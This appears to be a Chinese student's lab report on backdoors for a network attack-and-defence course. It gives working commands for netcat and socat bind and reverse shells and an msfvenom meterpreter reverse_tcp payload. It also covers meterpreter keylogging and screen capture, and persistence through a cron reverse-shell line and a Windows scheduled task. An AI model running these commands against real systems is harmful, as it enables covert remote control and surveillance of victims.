20145208 蔡野 《网络攻防》 后门原理与实践

20145208 蔡野 《网络攻防》 后门原理与实践

实验内容概述

• 简单实用netcat和socat获取靶机shell，并实现任务计划启动；使用msf-meterpreter生成可执行后门文件获取靶机shell，并进行一些命令操作，如查看ip、截屏、记录键盘输入、获取ruby交互界面、进程迁移、安装成服务等。

基础问题回答

• 如何将一个后门安装到系统中？

  • 将后门程序伪装进软件中进去系统。
  • 在其他软件或文件中进行捆绑。

• 后门如何启动起来(win及linux)？

  • windwos之中设置任务启动计划，在linux之中设置cron。

• Meterpreter有哪些给你映像深刻的功能？

  • 键盘记录，可以猜测他人密码或其他键入信息。
  • 截屏。可以看的别人屏幕。
  • 视频。想想就可怕****

• 如何发现自己有系统有没有被安装后门？

  • 如果莫名其妙的卡顿出现，或者内存占有忽然变高，或者感觉有什么异常的，都有可能是后门。

实验过程记录

使用netcat获取主机操作Shell，cron启动

linux获取windows的shell

• 首先两个操作系统中都要有ncat，kali中已经自带，window需要下载码云上的压缩包到window中，解压到相应的system中可以直接在命令行中运行。
• kali下使用ifconfig来获取卡里主机的ip。
• 在kali下使用nc -l -p 5208来将5208设置成监听端口开始监听，windows下输入netcat.exe -e cmd 172.30.2.230 5208实现kali对windowsshell的控制并利用ipconfig来验证。

windows获取linux的shell

• windows下使用以下命令netcat.exe 172.30.2.230 5208监听
• kali下使用nc -e /bin/sh -l -p 5208反弹连接windows
• 利用ifconfig验证

ncat传输文件

• windows系统使用ncat.exe -lv 1452 > cy_file.exe监听准备接受文件
• kali系统使用ncat -nv 172.30.3.151 1452 <pwnx来发送指定文件

使用socat获取主机操作Shell

• windows利用socat获取kali的shell：
• kali上用socat tcp-listen:5208把cmd绑定到端口5208
• 同時用socat tcp-l:5208 system:bash,pty,stderr反弹连接
• windows使用socat readline tcp:172.30.2.230 5208开启监听
• 成功，使用ifconfig检测

meterpreter

生成后门程序

• 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.2.230 LPORT=208 -f exe >20145208.exe来生成后门程序，然后发送到windows机中。

• 使用msfconsole命令开启msf进行设置

• 这时候监听已经开始了，在windows中运行之前的后门程序可以成功控制远程shell。

meterpreter信息搜集

• 查看系统版本信息

• 对靶机进行截图

• 记录键盘输入

• 安装为系统服务（两种方法，第一种可能因为权限原因失败，第二种成功）

后门启动

Windows

• 在控制面板-管理工具-任务计划程序中添加任务

• 添加名称，新建触发器，新建内容

• 这里我设置成当靶机锁定的时候自动连接，也可以设置成其他条件，如开机启动或其他条件。测试有效：

cron启动

• kali下终端使用crontab -e修改配置文件，根据格式m h dom mon dow user command来填写启动的时间，加入下面一行：
  * * * * * /bin/netcat 172.30.2.230 5208 -e /bin/sh

• 第一个星号可以设置成0-59的数字，即每小时的第几分钟启动，同理下个星号是1-24，下个是1-12···

• 使用crontab -l查看配置文件（老师的kali原本自带了一个地址）

• 这样就使得kali系统内每分钟自动运行指令，反弹至pc端的5208端口。

实验感想

• 真是发现了自己的电脑安全多么脆弱，下了那么多盗版的正版的软件，不知道有多少后门，先把摄像头糊上再说